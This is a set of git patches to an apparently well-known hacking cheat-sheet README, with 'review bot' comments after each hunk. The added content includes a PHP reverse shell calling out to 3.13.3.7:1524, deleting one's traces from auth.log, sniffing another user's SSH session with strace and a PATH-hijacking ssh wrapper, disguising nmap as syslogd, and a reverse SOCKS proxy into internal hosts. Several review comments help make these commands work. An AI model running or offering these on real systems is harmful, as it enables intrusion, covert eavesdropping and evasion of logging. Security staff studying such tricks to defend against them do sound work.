From 562edafa53273bf6edb61e341830e949c7296f5f Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:18:59 +0000
Subject: [PATCH 01/11] Update README.md
reverse shell with PHP
---
README.md | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/README.md b/README.md
index f139f73..4cc599c 100644
--- a/README.md
+++ b/README.md
@@ -30,6 +30,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [without Bash](#rswob-anchor)
1. [with Python](#rswpy-anchor)
1. [with Perl](#rswpl-anchor)
+ 1. [with PHP](#rswphp-anchor)
1. [Upgrading the dumb shell](#rsu-anchor)
1. [Upgrade a reverse shell to a pty shell](#rsup-anchor)
1. [Upgrade a reverse shell to a fully interactive shell](#rsup2-anchor)
@@ -292,6 +293,12 @@ $ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprot
# method 2
$ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
```
+
+**5.i.e. Reverse shell with PHP**
+
+```
+php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'
+```
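Review bot: the ToC entry added in the first hunk links to `#rswphp-anchor`, but this hunk adds only the heading and the code block and no anchor element for that id, so the new link dangles; add the same kind of anchor the sibling reverse-shell sections use next to the `**5.i.e. Reverse shell with PHP**` heading.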
From 4f0babe97be27271f4097fc8c1f4ee182beaf580 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:27:18 +0000
Subject: [PATCH 02/11] Update README.md
tiny url
---
README.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 4cc599c..2c72d11 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,7 @@
# THC's favourite Tips, Tricks & Hacks (Cheat Sheet)
+## Available at [https://tiny.cc/thctricks](https://tiny.cc/thctricks)
+
A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.
We show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.
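Review bot: a link line is being added as a `##` heading directly under the `#` title, which puts an "Available at ..." entry into the rendered document outline; a plain line or a bold line would carry the URL without creating a section.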
From e123304794184b2e9a667b4139f8b27bef9dda8e Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:29:36 +0000
Subject: [PATCH 03/11] Update README.md
typo. thanks acp.
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 2c72d11..86cc61b 100644
--- a/README.md
+++ b/README.md
@@ -148,7 +148,7 @@ Binary files transfer badly over a terminal connection. There are many ways to c
Encode:
```
-$ uuencode /etc/issue.net issuer.net-COPY
+$ uuencode /etc/issue.net issue.net-COPY
begin 644 issue-net-COPY
356)U;G1U(#$X+C`T+C(@3%13"@``
`
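Review bot: the command now names the output `issue.net-COPY`, but the captured output on the next line still reads `begin 644 issue-net-COPY`; uuencode writes its second argument into the begin line, so the recorded output should be updated to `begin 644 issue.net-COPY` to match the corrected command.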
From 1bd7ad4de87ee88804d384675875a74dc4d8967c Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:46:38 +0000
Subject: [PATCH 04/11] Update README.md
cleanup and ssh strace fix
---
README.md | 9 ++++-----
1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index 86cc61b..66c1de0 100644
--- a/README.md
+++ b/README.md
@@ -391,6 +391,7 @@ This will reset the logfile to 0 without having to restart syslogd etc:
This will remove any sign of us from the log file:
```
+# cd /dev/shm
# grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log
```
@@ -446,8 +447,7 @@ Store data in `/mnt/crypted`, then unmount:
**8.i. Sniff a user's SSH session**
```
-$ strace -p -e trace=read -o ~/.ssh/ssh_log.txt
-$ grep 'read(4' ~/.ssh/ssh_log.txt | cut -f1 -d\"
+$ strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
```
Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
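Review bot: `-p` requires a PID and none is supplied in the new line (the `2>&1` after it is a shell redirection, not an argument), so strace exits with a usage error; write it as `-p <PID>` so readers see the missing parameter. The replaced lines had the same gap.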
@@ -458,11 +458,10 @@ Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strac
Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
```
-# Add ~/.ssh to the execution PATH variable so our 'ssh' is executed instead of the real ssh:
+# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:
$ echo '$PATH=~/.local/bin:$PATH' >>~/.profile
-# Create our log directory and our own ssh binary
-$ mkdir ~/.ssh/.logs
+# Create a log directory and our own ssh binary
$ mkdir -p ~/.local/bin ~/.ssh/logs
$ cat >~/.local/bin/ssh
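Review bot: the unchanged line `$ echo '$PATH=~/.local/bin:$PATH' >>~/.profile` does not set PATH: with the leading `$`, the line appended to ~/.profile expands at login to the current PATH value followed by `=~/.local/bin:...` and is run as a command name, which fails, so the wrapper in ~/.local/bin is never picked up. It should read `PATH=~/.local/bin:$PATH` (plus `export` if PATH is not already exported). Also the new comment says "our own ssh binary" while the next line creates a shell script with `cat`; "wrapper script", as in the intro sentence, is more accurate.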
From cbd4599e382f64b1564062d5375b6299a47a3fc5 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:11:14 +0000
Subject: [PATCH 05/11] Update README.md
shar hacks.
---
README.md | 22 ++++++++++++++++++++++
1 file changed, 22 insertions(+)
diff --git a/README.md b/README.md
index 66c1de0..59818ae 100644
--- a/README.md
+++ b/README.md
@@ -24,6 +24,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [uuencode](#feu-anchor)
1. [openssl](#feo-anchor)
1. [xxd](#fex-anchor)
+ 1. [Multiple binaries](#xeb-anchor)
1. [File transfer using screen from REMOTE to LOCAL](#ftsrl-anchor)
1. [File transfer using screen from LOCAL to REMOTE](#ftslr-anchor)
5. [Reverse Shell / Dumb Shell](#rs-anchor)
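Review bot: the new anchor id `#xeb-anchor` breaks the `fe*` prefix convention of its siblings (`#feu-anchor`, `#feo-anchor`, `#fex-anchor`); `#feb-anchor` would fit the File Encoding group.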
@@ -195,6 +196,27 @@ Decode:
```
$ xxd -p -r >issue.net-COPY
```
+
+**4.iii. File Encoding - Multiple Binaries**
+
+Method 1: Using *shar* to create a self extracting shell script with binaries inside:
+```
+$ shar *.png *.c >stuff.shar
+```
+Transfer *stuff.shar* to the remote system and execute it:
+```
+$ chmod 700 stuff.shar
+$ ./stuff.shar
+```
+
+Method 1: Using *tar*
+```
+$ tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64
+```
+Transfer *stuff.tgz.b64* to the remote system and execute:
+```
+$ openssl base64 -d | tar xfz -
+```
**4.iv. File transfer - using *screen* from REMOTE to LOCAL**
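Review bot: both methods in the new section are labelled "Method 1"; the *tar* one should be "Method 2". The heading number `4.iii.` also collides with the existing xxd section that precedes it, and the following *screen* section is still `4.iv.`, so the new section and the two after it need renumbering; in addition, no anchor matching the ToC link added in the first hunk is present here. Minor: in the second method the decode command reads from stdin, so "execute" should say to paste or redirect the content of *stuff.tgz.b64* into it.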
From b3d88de8599d0908a02fa71eacaba66369ef8067 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:13:18 +0000
Subject: [PATCH 06/11] Update README.md
typo. link.
---
README.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index 59818ae..bd68fe8 100644
--- a/README.md
+++ b/README.md
@@ -24,7 +24,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [uuencode](#feu-anchor)
1. [openssl](#feo-anchor)
1. [xxd](#fex-anchor)
- 1. [Multiple binaries](#xeb-anchor)
+ 1. [Multiple binaries](#feb-anchor)
1. [File transfer using screen from REMOTE to LOCAL](#ftsrl-anchor)
1. [File transfer using screen from LOCAL to REMOTE](#ftslr-anchor)
5. [Reverse Shell / Dumb Shell](#rs-anchor)
@@ -197,7 +197,7 @@ Decode:
$ xxd -p -r >issue.net-COPY
```
-**4.iii. File Encoding - Multiple Binaries**
+**4.iv. File Encoding - Multiple Binaries**
Method 1: Using *shar* to create a self extracting shell script with binaries inside:
```
@@ -219,7 +219,7 @@ $ openssl base64 -d | tar xfz -
```
-**4.iv. File transfer - using *screen* from REMOTE to LOCAL**
+**4.v. File transfer - using *screen* from REMOTE to LOCAL**
Transfer a file FROM the remote system to your local system:
@@ -246,7 +246,7 @@ $ rm -rf screen-xfer.txt
```
-**4.v. File transfer - using *screen* from LOCAL to REMOTE**
+**4.vi. File transfer - using *screen* from LOCAL to REMOTE**
On your local system (from within a different shell) encode the data:
```
From 8a625e56af853682eea144643f77eef75d4a3fb6 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:14:23 +0000
Subject: [PATCH 07/11] Update README.md
tar method 2
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index bd68fe8..21ef4e4 100644
--- a/README.md
+++ b/README.md
@@ -209,7 +209,7 @@ $ chmod 700 stuff.shar
$ ./stuff.shar
```
-Method 1: Using *tar*
+Method 2: Using *tar*
```
$ tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64
```
From 3d81fccf685a837607ee4fb4d8a25cc8913482c4 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 16:51:26 +0000
Subject: [PATCH 08/11] Update README.md
hide your commands...
---
README.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/README.md b/README.md
index 21ef4e4..c444771 100644
--- a/README.md
+++ b/README.md
@@ -75,6 +75,11 @@ $ id
**1.ii. Hide your command**
+```
+$ exec -a syslogd nmap -T0 10.0.2.1/24
+```
+
+Alternative if there is no Bash:
```
$ cp `which nmap` syslogd
$ PATH=.:$PATH syslogd -T0 10.0.2.1/24
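Review bot: the new snippet and the alternative below it should document what they do and do not change. `exec -a syslogd` only rewrites argv[0], so the process shows "syslogd" in `ps aux` but still reports `nmap` in `/proc/<pid>/comm` and `/proc/<pid>/exe`; the `cp` variant changes those too, but its `exe` link then points at the copied file in the current directory rather than a system path. Stating this keeps readers from assuming the name is hidden everywhere.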
From 449d3c6fe7f156248a15542dc53bf43f0acf09d4 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 17:02:53 +0000
Subject: [PATCH 09/11] Update README.md
ssh -R reverse socks proxy
---
README.md | 12 ++++++++++++
1 file changed, 12 insertions(+)
diff --git a/README.md b/README.md
index c444771..97f1de3 100644
--- a/README.md
+++ b/README.md
@@ -16,6 +16,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [Almost invisible SSH](#ais-anchor)
1. [SSH tunnel OUT](#sto-anchor)
1. [SSH tunnel IN](#sti-anchor)
+ 1. [SSH socks5 IN](#ssi-anchor)
3. [Network](#network-anchor)
1. [ARP discover computers on the local network](#adln-anchor)
1. [Monitor all new TCP connections](#mtc-anchor)
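Review bot: the ToC label "SSH socks5 IN" does not match the heading added in the next hunk ("SSH sock4/5 IN"); pick one wording, and make sure an anchor for `#ssi-anchor` exists next to that heading, since none is added in this patch.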
@@ -117,6 +118,17 @@ $ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
```
Anyone connecting to host.org:31338 will get connected to the compuyter 192.168.0.5 on port 80 via your computer.
+
+**2.iv SSH sock4/5 IN**
+
+OpenSSH 7.6 adds support for reverse dynamic forwarding. In this mode *ssh* will act as a SOCKS4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.
+
+In this example anyone configuring host.org:1080 as their SOCKS4/5 proxy can connect to any internal computers on any port that are accessible to the system where *ssh* was executed:
+
+```
+$ ssh -R 1080 user@host.org
+```
+
---
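Review bot: the statement that anyone can use host.org:1080 as a proxy is stronger than what `ssh -R 1080 user@host.org` does: by default a `-R` listener binds to the loopback interface on host.org, and exposing it beyond that is governed by the sshd `GatewayPorts` setting on that host, so the text should state that dependency. Also the heading `**2.iv SSH sock4/5 IN**` is missing the trailing period the other headings use (`2.iv.`) and "sock4/5" should be "socks4/5".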
From a488a678c5765ecc50b4c8bd79e4d46262ec5dc2 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 17:03:13 +0000
Subject: [PATCH 10/11] Update README.md
sockSSSS
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 97f1de3..8813579 100644
--- a/README.md
+++ b/README.md
@@ -119,7 +119,7 @@ $ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
Anyone connecting to host.org:31338 will get connected to the compuyter 192.168.0.5 on port 80 via your computer.
-**2.iv SSH sock4/5 IN**
+**2.iv SSH socks4/5 IN**
OpenSSH 7.6 adds support for reverse dynamic forwarding. In this mode *ssh* will act as a SOCKS4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.
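Review bot: the typo fix leaves `2.iv` still without the trailing period used by the other section headings, and the ToC entry from the previous patch still reads "socks5" while the heading now reads "socks4/5"; align both while here.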
From ca8297287fbaaab73b8b7340b4a44f4d20d8ee15 Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 17:03:44 +0000
Subject: [PATCH 11/11] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 8813579..b7c8c09 100644
--- a/README.md
+++ b/README.md
@@ -118,7 +118,7 @@ $ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
```
Anyone connecting to host.org:31338 will get connected to the compuyter 192.168.0.5 on port 80 via your computer.
-
+
**2.iv SSH socks4/5 IN**
OpenSSH 7.6 adds support for reverse dynamic forwarding. In this mode *ssh* will act as a SOCKS4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.
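Review bot: this hunk replaces a blank line with a blank line, so it is a whitespace-only change (presumably trailing whitespace), but the commit message says only "Update README.md"; say what was cleaned up. The context line with `compuyter` right above it is a typo that could be fixed in the same pass.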